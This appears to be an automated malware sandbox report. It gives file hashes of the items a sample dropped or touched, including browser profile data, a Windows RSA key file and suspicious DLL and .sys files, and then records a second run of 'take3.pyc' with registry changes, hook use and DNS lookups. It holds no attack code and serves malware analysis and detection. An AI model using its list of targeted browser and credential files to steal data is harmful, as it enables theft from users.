C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\activity-stream.discovery_stream.json.tmp

MD5 62c6758b5ac6472f1fcf0552ea4b811a
SHA1 385483c1776e1fe7027eb75d712468c1098992d6
SHA256 08d358578b50502197332ecde52ff37100d893a0d8ece5c84cc7f90fb3d34763
SHA512 776959369e47a83c8d20fad7a1e3c84340cee295fe5d8d00ab15b0b26ea3d37acfdc6a2dfb6f2895cdcf504bc3fdd915e31d6f9a7d3657c58ebc59dbeec273f6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\AlternateServices.bin

MD5 e73d672f1f1987fdf54903fc9f18e4d7
SHA1 f55a14dd454c25aa4ea2a592ed5514bf0300ced7
SHA256 1133a254b93bf54c505a0b524d08a510068584e69c527818d4936abec443128f
SHA512 46ef962632a513982aa4574eaa5ea1f99af2c8010cdf782db45673fe10b1125249b860bcff1ba353c1b50b1db24ab7cede0a1a56b737443c5bd698502dcb571b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f2a503a81f5e9e2e4049935ec16696f6
SHA1 b59c286c4591e4b17eb1173f5958f62d8abf700a
SHA256 b4a148a85ffe5281834096a720c885a4a6597422e4efafba3c710528c66baa38
SHA512 2a07d8b8d528d864fb45b09a9eed98cdc0201b096b9bcb459440852a819e2b78fcc29f064a4c44d081f36c93c8d52d5f6dc3f02bcca594d98e2d9203ea86d312

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 4a8282ae90a5a3df1fa49210ae8c2f95
SHA1 3c4ce45c6b17ade487a810def96921bf79a5ab82
SHA256 4c7d82e79ef81b812e393f93660e71130174f55b806bc93d9d6385edf591b571
SHA512 7aff33271a992605ef424b6ab208083e591a18a5a8cbb2035f4f2d137cf1120e3062176225e10c539813140921bdc0367d84131d4a9f2c8e6b0c88970969b6f5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\aa69c064-1687-48e5-a457-065383d4ff73.dmp

MD5 7ce8e75797c8155736f412f133c53748
SHA1 f4b10c760403073ba6a41f4d258862b4e7de3e8c
SHA256 2fbf1e3de8fd0858820d6b66c045af69f671226b25fafd867a4b5f7ecadde562
SHA512 3d8a83b5e3bc290952bf55da298c0e404389b163fca4aa6cb0d97412370e7ca020b2971f4734796b0525cb9c98ac3b0183de02fe0724ccedd208c8072cf182d2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 39b5075df1ea5222f9ba14a30ecca66d
SHA1 ea6426a6a22a2c8ab686c195cdf933229a73ed60
SHA256 21657025796947c8a888516416622554a319079b58c12fe9f7d32041edad2701
SHA512 677139ed19a6c5b78a39397517218f61b2d359338e63941d9e01b2c4854245d8c1bca09ccb11d70641f53864972adb88375bd911d48d09ba3fc6298968ce9392

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\c47ea9be-c29c-4346-ab06-996a672d35b3.dmp

MD5 a1bd6a892720f316d3627ff06e048920
SHA1 102b57a04ad76bb62547390c0b94e54e9a5abbdb
SHA256 8ee110ec8455dd6c112d73be9356177681e0996b92bd07b0fb50c975792abf34
SHA512 8f3c33796113c54157beb53eceb03d300fb14b9a9747179f6ffaad658d60e479f1b87cf537cf8528a52b0a3a060902a1e4859e1fb1019e042ce76fb180d3865b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d648f1c3e8d0d4c5fc7e524fa944c470
SHA1 7ddf585d42cddf556b24245cc1629b47bea3f1e6
SHA256 26ae126052ea62f108f8222790c4cb72d576505a36f613acf4dab3ccf6d97827
SHA512 84ae70929a6d6f26987ad56af101cc0d7b518cecd5a09705b88a2af092666435281b708b19c4666648ed14b680b7671088649c6232730441d4e8f47b79ee4d9d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6214640659d6f07be087940fbe7ed01e
SHA1 e7d111742c707682971d5ab6214100423fef1cff
SHA256 773b981c0a5d80b0a14b7f79fa4374818d1735021d824cd6ca8bda6091b554cf
SHA512 f62c07bdcfaf1f43293dae81c3a1b08de1f8ce3763ac919676aaf62ed2f5950d80cc0d5e4ba71c893c98d4d93b916b603f8f2274cc75739e09b0771cc43a5b85

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\1f3102bc-31eb-4727-a562-f2fff9475dcf.dmp

MD5 fe122b2894d3ae721b96241214baa2aa
SHA1 f05324b00561720f5a443b4bd35377247fca646c
SHA256 a9bd58c8dc538aee4851fd4a7d508dd75ee94931ffad5cfda547876baafe9bf9
SHA512 e57040399a0703098a58435b64e52baaa97f2bfb730a84dfaca4a200fc16c5ce204f2cbbbb3af564929045064ecf3a0902a405ed49e63287e5b5cb97e1bfc2b4

C:\Windows\directx.sys

MD5 be7ae462c8213de7c487e49df0ed0171
SHA1 3ee6853ad52679a916ebead929344477ed804030
SHA256 6c0bba21c14585052a0dbd51c0aba8e7651ac0e034b68ec7c90b50ebfdd52e52
SHA512 2dc1f9b32849684a905f65894561dfb3c1938b3990c701b76dd7a597b50deb01ae3d6d902a81641e3051cf75fa6edd81f68bb74de0c95169967bac1de624d0da

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ac591b1ca7f178d5625d4c1699dcff5b
SHA1 c02fcba2e3e0e06d588e40c9081d7e00088f64b7
SHA256 1ddfc050cc24ab88f9bdb264036013720c6d6a49dc3b2a1e31610b667fb7abde
SHA512 77df5b4ef6c4a2a05fc2e68b14d0c41e0b714992c36df1493185f9d9d2971fbeed29bfb5e412296be1cb11cc8e53dcdc0811e7134fe9c09fa1490d9f18fbf6f4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 2bf2d125c7853f70ea19544c7e477733
SHA1 efcb265edded8c6fa9bfa584513b168559963bb0
SHA256 f1769609ef004fa743026a216e3332be897965725f7d0cd3310d972c703af8bf
SHA512 1001e8644cdac8c22b291373e16df070e081b04d475ce943ef31c9a078a330edfbb4412636ee720f8010afd2e1acf5498746a4c197a569ed7aeae02bdf8b6eb2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fde4df520933fb931f192326ac045c28
SHA1 b7b904e13ddd4cb99cde3259ecb74bed4c9dc428
SHA256 24864f53c0740d125c3d480a743a9f0880200d6cefa224be2acd2a6091282e48
SHA512 de9e47edd5a0929393308af69503efb607b89b55db29bec5daf7dcd586c5cbcc6e993f63dd245d0ed1dd1028b8217fa0b73974b01709fa1f8cf633403fb38045

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\ce5dd4f6-1869-4be2-8fe0-22c4a8ebb86b.dmp

MD5 fb94a5390bcb43870d75001a15379177
SHA1 6fe002718a01cee9a2eb830faeeb77046bbb1f83
SHA256 587a6adbff4b05b5da4db8ee4c1582c03836232e62300e90e9824b79d5c6aa8a
SHA512 6617ebd32632f0706f157c3c67c60360d3ca2eb0baa695b8833da207e5dea2e3ded25cc94627b487d0bd43ed6ffdcf6e88cb237c02863d5cef433fa649383a8d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 d6a00623f64410f329b9c151b9f43dab
SHA1 38b8f0ff6ff4c726131e0d503cb78eb0e95c38c6
SHA256 c1cf60a3fda85913b0850aae1b7c19ec1388755f8462a1b116832e00bb38c62c
SHA512 c01f6a1811772e666c791608d43316b7e60fab1dacf70b29a5da3bd9f7e6b7139c086256cd755ab34a141cefdefe082a52337d3ee1eda947d862d608c32b9383

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\9db1edd3-7ab8-4f3c-8168-e00b604e5ccc.dmp

MD5 a3d943fdbf1431b9ea7de8fde154bd7e
SHA1 7ebcbbc52725e803d5db631930b36ef31cdef0d3
SHA256 951735a953e4cf39598e97de7f643beccd49d32266419c39ea9a733615423ed5
SHA512 dd58465a25cbffaf69caafb5afb659b2cfa3f241a401661d6ad9f8483c9ba3a27c7c81b0ae034ef90bb7f4d4bdc5f3e0e756d39fc6afb89fee59c61cb85b6383

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 350af9db674c845e145580c10fbe39f0
SHA1 5c029141b5f70151c425e7d23e516bf7e9882f3d
SHA256 35f69e3fd635b4ec8ee85b7d6debe5b94758509ca0c00d083c9aa8899c75dc68
SHA512 644b49bb3386f7f0c017d7ef19875aed149eb532dc9a50450203de0cb329ada5cffc95e145c70f0c82a38875f5fb414bbee7f9a52afd4d7381ad81b05f7036ad

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3495501434-311648039-2993076821-1000\0f5007522459c86e95ffcc62f32308f1_ccb8eda8-03c5-41b1-ae24-26e7c7115f30

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\prefs-1.js

MD5 45f3d92814ae8eddf5db9dea570cff46
SHA1 c8bb155206f0ab66e20bcf223ed840906b04a1a3
SHA256 c7e29d4e47c8e502653ba89a13ff5f19b19a48034fa0d8502716b8565b31496f
SHA512 68c8248b60e642fe28717b79749c2c6c219951089b5f642a780796caea49878c670ec35372e72188cd5ed366eb6454a10067d38c4f074e41c00b03a47070a719

C:\Users\Admin\AppData\Local\Temp\Montevideo

MD5 d635e27514a1f665b02fbb140a9117ab
SHA1 e496d02b4b6caee2f1b2bc8107cb6d16fa74e0a5
SHA256 0c5b07ab60b1c43a5e44d4d4e63b17d17d7325263fd8ecb570bce9221aab5210
SHA512 3cc438d9e783aed5b6e138dea4bb9b8b4a8e1669a0004e4536ccaa73a29a03e89429e3b5de6651c9f6d5a6bf7fd1e1b6a658f1441cd09a33430ce3e986610fb0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\datareporting\glean\db\data.safe.tmp

MD5 0b096754c0aae0a13f1403a45b9079ce
SHA1 3f3741e86beaf8db4884dee1ce220053d317d6ec
SHA256 3567a2ecf66bdde80dcb3f1570c9056c72ee1fe4afc77c57978145915e3386bc
SHA512 32f8d303a305b38ad0f1d5b49bcf423dcae9b65a62cd4ca3107c327351e0722aa42375a7f29410a9a4264bf31c85952edf85e80ee8850dbe72afa854a0fcddc0

C:\Users\Admin\AppData\Local\Temp\autF4AD.tmp

MD5 cad8bd2139d6d7a1ab09bfd32d9496d5
SHA1 dfb63f6ca4f117a45825cf6a60f7bab71fffbece
SHA256 5b870d44c946d17f9eb7569f19b674130a022c07211c315b4fe2603183f196d3
SHA512 ade1d8a48054ee4c7162a0a5c047095ab18c00146a733e269a3021fcd0a7baedc7a71d34e7452fc26118dc256a701c52eb157e7fb5e5b5b5769063b67c8849fe

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Local\Temp\tmpAEDA.tmp.exe

MD5 898988b95ea724890395b07079931a87
SHA1 ebe57eb9e5dab3691e41dddcf0115ec224475efb
SHA256 9f507ff3786be35b00d355ff460460bb1f11399b5e8e12ddda5fdb9af64a561b
SHA512 ff80c8ac06e1127ea871a3b2ad605d723a466ac0d6fd7ef5e15e6008fd45dfffbdbf0d5b585e10b8b3e1347f810167c6e5f2a6bb2e8cf8acd79de10c1db8fe52

C:\Windows\directx.sys

MD5 961dac9e6c3d7fc36a2c25af58be96b3
SHA1 3ecf531200497b568ad4875a542488bc4568c33b
SHA256 c0dcb9003858f16c1aea1d64cf5b63136a1b04c11d961e0eeade92e61ce002b7
SHA512 405ec3176dbe1772fd158095db41f3066754184ca7cb456d7f8a88c878c269fd22bcb9be2176898e4330c863de921a49e0887bddc8c62be8160d35cdc0ad0711

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\startupCache\webext.sc.lz4

MD5 38098fb118638df0a0118395c3a7e7e1
SHA1 1f71a9a1678b353327a0aef5e4c6b10f391138a8
SHA256 4ca755ea5212de953f535f769d103c1df4414a1e2fa3e656a2f63a8a352d7b50
SHA512 974047df6bafc8b7d35e0dc951e8825fb8b3d089260ddc5d2c52f27c381a38349fa37b338e15f35ba7e52fafb7ef6cde205d0dbbed9cdf63e85465c0d5936251

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 b6d544f66af423aeb5a7872224ac1036
SHA1 96d379afec895ef3529acfb27f68b3e110df646b
SHA256 dd6365ee30ae7be021fef291fee26caa1911847513243d219a4f773a8e757648
SHA512 0aea6889992317ff7c27cc5f1e2af9878d7614759b9cbc297cd22f28b436b7bc102acdb6ad5263266ca271758d462cefc8fd85189f5eb46ee272ab39bbf0de86

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 fabea81520534cf266d848dc68c5a1b7
SHA1 5e08b8873064193d696544fcbaccaecf97730033
SHA256 a7ff057af5f600ef3fb56c348725036a1accf35a565da3dd97c4595ae6e7b8df
SHA512 064efbdf23b75e4fab553239fff0956b2f903f5cffc4dbbed4d3ff08f616744767ee3d931c251c81ba03eecf6d2a7a195ba8762313a8cfa610b516ae98dc5a9a

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-04 13:22

Reported

2024-12-04 13:25

Platform

win10ltsc2021-20241023-en

Max time kernel

100s

Max time network

145s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\take3.pyc

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\take3.pyc

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 21.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

N/A